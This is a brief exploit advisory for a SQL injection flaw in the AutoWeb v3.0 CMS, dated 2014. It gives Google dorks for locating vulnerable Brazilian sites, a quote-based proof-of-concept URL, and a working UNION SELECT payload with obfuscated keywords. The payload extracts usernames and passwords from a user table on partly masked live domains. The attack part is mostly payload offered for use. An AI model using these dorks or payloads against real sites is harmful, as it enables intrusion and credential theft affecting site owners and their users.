# AutoWeb v3.0 CMS SQL Injection
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 20/10/2014
# Vendor Homepage: http://www.multdivision.com.br/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork(page admin login): intitle:"AutoWeb v3.0" site:.br
# Google Dork(Xploit): site:YourSiteHere ext:php
# Url vul : All Parameter are vuls
# PoC : http://www.citXXol.com.br/mostrar-servico.php?id=2'
# Xploit: http://www.XXXg.edu.br/mostrar.php?id_noticia=95+and+0+/*!Union*/+/*!sElect*/+1,/*!group_concat%28username,0x3a,senha%29*/,3,4,5,6%20/*!from*/%20user--